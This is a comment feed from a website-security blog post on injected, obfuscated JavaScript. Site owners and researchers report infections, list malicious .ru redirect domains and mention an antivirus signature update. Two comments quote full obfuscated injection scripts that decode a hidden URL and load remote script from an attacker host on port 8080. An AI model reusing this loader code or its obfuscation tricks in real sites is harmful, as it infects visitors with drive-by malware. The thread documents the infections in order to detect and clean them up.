<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: From Hidden Iframes to Obfuscated Scripts</title>
	<atom:link href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Thu, 29 Jul 2010 19:13:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: MK</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6786</link>
		<dc:creator>MK</dc:creator>
		<pubDate>Mon, 22 Feb 2010 11:23:33 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6786</guid>
		<description>I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.</description>
		<content:encoded><![CDATA[<p>I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Noxwizard</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6783</link>
		<dc:creator>Noxwizard</dc:creator>
		<pubDate>Sun, 21 Feb 2010 09:22:55 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6783</guid>
		<description>I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.</description>
		<content:encoded><![CDATA[<p>I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Noxwizard</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6782</link>
		<dc:creator>Noxwizard</dc:creator>
		<pubDate>Sun, 21 Feb 2010 09:18:17 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6782</guid>
		<description>Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc
Of course it&#039;s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767</description>
		<content:encoded><![CDATA[<p>Looks like a possible evolution of this one. The injected code is here: <a href="http://noxwizard.pastebin.com/f6e4b85cc" rel="nofollow">http://noxwizard.pastebin.com/f6e4b85cc</a><br />
Of course it&#8217;s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: <a href="http://noxwizard.pastebin.com/f26805767" rel="nofollow">http://noxwizard.pastebin.com/f26805767</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anand</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6741</link>
		<dc:creator>Anand</dc:creator>
		<pubDate>Wed, 10 Feb 2010 18:56:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6741</guid>
		<description>My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.&lt;strong&gt;theantimatrix .ru&lt;/strong&gt;:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com

Can somebody let me know whats the harm that this code would have done? Appreciate your response.

Cheers
Anand</description>
		<content:encoded><![CDATA[<p>My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.<strong>theantimatrix .ru</strong>:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com</p>
<p>Can somebody let me know whats the harm that this code would have done? Appreciate your response.</p>
<p>Cheers<br />
Anand</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6699</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Mon, 01 Feb 2010 15:19:40 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6699</guid>
		<description>This must be yet another revision
&lt;code&gt;
try{window.onload=function(){Iebf2d21q07z = &#039;&#039; + &#039;i)c(#i$b)!a&amp;$-$(c$())o&amp;)m((.@c&amp;)!o&amp;(@n(&amp;s!)(t@!#a)n@!!t(@&amp;(@c^$^#o^#n&amp;t!a&amp;&amp;c!t(.!#(c(&amp;@^o))$^m#&amp;&amp;.@&amp;p@e@)^r&amp;e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&amp;m).#(b^i)$l&amp;$(&amp;!t$o^&amp;!p^&amp;.@&amp;#&amp;r!(u$:@))N#q#@5#(^b!(&amp;@h$3)f&amp;@)i#@t&amp;$w&amp;!1@r$#v!$/!&amp;@$g####o($@&amp;&amp;o(g$l)@!e@$.@(c$$()o&amp;m&amp;.$@(a^u!/^##g))()o#^o#&amp;#g$#l!^)e$$.&amp;#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&amp;(&amp;e#^n$t^@^$s!&amp;$^.(@r#!@u)$#&amp;/(a@$l$#l!(e!^g$)(r&amp;$#)o$^&amp;.^p()l!)^@/#$$##g#$o)@$o)$#^g(&amp;l(e@.#!c&amp;o&amp;@m$#/^&#039;.replace(/#&#124;@&#124;\^&#124;\$&#124;\!&#124;&amp;&#124;\)&#124;\(/ig, &#039;&#039;) ;
Jq2dz9nff1w0lm = &#039;appendChild&#039;;Rkn5tmljhj1c = d ocument.createElement(&#039;sc&#039;+&#039;ript&#039;);
Rkn5tmljhj1c.src = &#039;h&#039;+&#039;ttp://&#039;+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, &quot;8080&quot;);Rkn5tmljhj1c.setAttribute(&#039;defer&#039;, &#039;def&#039;+&#039;er&#039;);e val(&#039;document.body.&#039;+Jq2dz9nff1w0lm+&#039;(Rkn5tmljhj1c)&#039;);} }  catch(P052l4jn ) {}
&lt;/code&gt;

in this case translates to
iciba-com.constantcontact.com.perezhilton-com.&lt;b&gt;biltop .ru&lt;/b&gt;:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/</description>
		<content:encoded><![CDATA[<p>This must be yet another revision<br />
<code><br />
try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&amp;$-$(c$())o&amp;)m((.@c&amp;)!o&amp;(@n(&amp;s!)(t@!#a)n@!!t(@&amp;(@c^$^#o^#n&amp;t!a&amp;&amp;c!t(.!#(c(&amp;@^o))$^m#&amp;&amp;.@&amp;p@e@)^r&amp;e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&amp;m).#(b^i)$l&amp;$(&amp;!t$o^&amp;!p^&amp;.@&amp;#&amp;r!(u$:@))N#q#@5#(^b!(&amp;@h$3)f&amp;@)i#@t&amp;$w&amp;!1@r$#v!$/!&amp;@$g####o($@&amp;&amp;o(g$l)@!e@$.@(c$$()o&amp;m&amp;.$@(a^u!/^##g))()o#^o#&amp;#g$#l!^)e$$.&amp;#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&amp;(&amp;e#^n$t^@^$s!&amp;$^.(@r#!@u)$#&amp;/(a@$l$#l!(e!^g$)(r&amp;$#)o$^&amp;.^p()l!)^@/#$$##g#$o)@$o)$#^g(&amp;l(e@.#!c&amp;o&amp;@m$#/^'.replace(/#|@|\^|\$|\!|&amp;|\)|\(/ig, '') ;<br />
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript');<br />
Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} }  catch(P052l4jn ) {}<br />
</code></p>
<p>in this case translates to<br />
iciba-com.constantcontact.com.perezhilton-com.<b>biltop .ru</b>:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Larry at Home</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6692</link>
		<dc:creator>Larry at Home</dc:creator>
		<pubDate>Sat, 30 Jan 2010 18:55:42 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6692</guid>
		<description>May I ask what happens when I click on a hyperlink in a SPAM  that sends me to one of these posted malware sites? Specifically,I have traced the IP&#039;s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com</description>
		<content:encoded><![CDATA[<p>May I ask what happens when I click on a hyperlink in a SPAM  that sends me to one of these posted malware sites? Specifically,I have traced the IP&#8217;s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MK</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6684</link>
		<dc:creator>MK</dc:creator>
		<pubDate>Fri, 29 Jan 2010 09:44:29 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6684</guid>
		<description>As more of a explanatory note. The main difference between this and the previous version is the randomization of the &quot;megaid&quot; div id. Presumably to prevent this from being used as a signature.</description>
		<content:encoded><![CDATA[<p>As more of a explanatory note. The main difference between this and the previous version is the randomization of the &#8220;megaid&#8221; div id. Presumably to prevent this from being used as a signature.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MK</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6683</link>
		<dc:creator>MK</dc:creator>
		<pubDate>Fri, 29 Jan 2010 09:42:00 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6683</guid>
		<description>Revised yet again, most recent sample:

try{window.onload=function(){document.write(&#039;&lt;div&#160;id=Fuq9970c1s5ie8&gt;drudgereport-com.chinamob&lt;/div&gt;&#039;);Jzzicgcp586y245&#160;=&#160;document.getElementById(&#039;Fuq9970c1s5ie8&#039;).innerHTML&#160;+&#160;&#039;i)^l(e@&amp;&amp;.$c!&amp;#o#m)#&amp;!.($&amp;^w#s$j$$)-@c^!#@o$(m(@@.$!&amp;w()!a$^$!v(&amp;$e!(@b&amp;)&amp;a&amp;@!&amp;^n$#k$$^.@r!)(u!#^:)()O(&amp;o!s$#&amp;)@s^t)!#u$$))q!^u$!&amp;o()#y$@^v&amp;x)@^)/#&amp;#^h@$(o&amp;#^$m)e@!w##&amp;a^)y(&amp;!.!!c^o@m@)($.$$&amp;@#c&amp;&amp;@n$^!/&amp;$(h!@o$&amp;m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&amp;!^n!^#/)(&amp;(g(!o&amp;o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&amp;$e!#e$!&amp;$r@b@#$u$()!i^&amp;^l!(d$)!@e$r!^&amp;.@(#c&amp;(@&amp;#o!m#!(@/))w($&amp;o)$w&amp;)^a^$#r$&amp;!m&amp;@o#)r@y(^.&amp;^(c&amp;)^!o($&amp;m&amp;@!^/(^&#039;.replace(/\$&#124;\(&#124;@&#124;\^&#124;\)&#124;#&#124;\!&#124;&amp;/ig,&#160;&#039;&#039;)&#160;;document.write(&#039;&lt;scr&#039;+&#039;ipt&#160;src=h&#039;+&#039;ttp://&#039;+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g,&#160;&quot;8080&quot;)+&#039;&gt;&lt;/scr&#039;+&#039;ipt&gt;&#039;);}&#160;}&#160;catch(Tjkclo5m&#160;)&#160;{}

&lt;!--908fc049c965bc03ac9c678ea1cd685f--&gt;</description>
		<content:encoded><![CDATA[<p>Revised yet again, most recent sample:</p>
<p>try{window.onload=function(){document.write(&#8216;&lt;div&nbsp;id=Fuq9970c1s5ie8&gt;drudgereport-com.chinamob&lt;/div&gt;&#8217;);Jzzicgcp586y245&nbsp;=&nbsp;document.getElementById(&#8216;Fuq9970c1s5ie8&#8242;).innerHTML&nbsp;+&nbsp;&#8217;i)^l(e@&amp;&amp;.$c!&amp;#o#m)#&amp;!.($&amp;^w#s$j$$)-@c^!#@o$(m(@@.$!&amp;w()!a$^$!v(&amp;$e!(@b&amp;)&amp;a&amp;@!&amp;^n$#k$$^.@r!)(u!#^:)()O(&amp;o!s$#&amp;)@s^t)!#u$$))q!^u$!&amp;o()#y$@^v&amp;x)@^)/#&amp;#^h@$(o&amp;#^$m)e@!w##&amp;a^)y(&amp;!.!!c^o@m@)($.$$&amp;@#c&amp;&amp;@n$^!/&amp;$(h!@o$&amp;m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&amp;!^n!^#/)(&amp;(g(!o&amp;o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&amp;$e!#e$!&amp;$r@b@#$u$()!i^&amp;^l!(d$)!@e$r!^&amp;.@(#c&amp;(@&amp;#o!m#!(@/))w($&amp;o)$w&amp;)^a^$#r$&amp;!m&amp;@o#)r@y(^.&amp;^(c&amp;)^!o($&amp;m&amp;@!^/(^&#8217;.replace(/\$|\(|@|\^|\)|#|\!|&amp;/ig,&nbsp;&#8221;)&nbsp;;document.write(&#8216;&lt;scr&#8217;+'ipt&nbsp;src=h&#8217;+'ttp://&#8217;+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g,&nbsp;&#8221;8080&#8243;)+&#8217;&gt;&lt;/scr&#8217;+'ipt&gt;&#8217;);}&nbsp;}&nbsp;catch(Tjkclo5m&nbsp;)&nbsp;{}</p>
<p>&lt;!&#8211;908fc049c965bc03ac9c678ea1cd685f&#8211;&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Henry</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6682</link>
		<dc:creator>Henry</dc:creator>
		<pubDate>Thu, 28 Jan 2010 22:14:40 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6682</guid>
		<description>Hi, Thank you. We didn&#039;t know about this. We were hit three times in the last two weeks. The URL they used on our site yesterday:  
fbcdn-net.yallakora.com.google-co-in.&lt;strong&gt;counterbest .ru&lt;/strong&gt;:8080/google.com/google.com/warez-bb.org/china.com/bit.ly/</description>
		<content:encoded><![CDATA[<p>Hi, Thank you. We didn&#8217;t know about this. We were hit three times in the last two weeks. The URL they used on our site yesterday:<br />
fbcdn-net.yallakora.com.google-co-in.<strong>counterbest .ru</strong>:8080/google.com/google.com/warez-bb.org/china.com/bit.ly/</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pob</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6680</link>
		<dc:creator>pob</dc:creator>
		<pubDate>Thu, 28 Jan 2010 10:36:55 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6680</guid>
		<description>I have just updated the Sophos detection for Troj/JSRedir-AK for this variant. 
These guys are morphing the code more regularly than they used to.</description>
		<content:encoded><![CDATA[<p>I have just updated the Sophos detection for Troj/JSRedir-AK for this variant.<br />
These guys are morphing the code more regularly than they used to.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
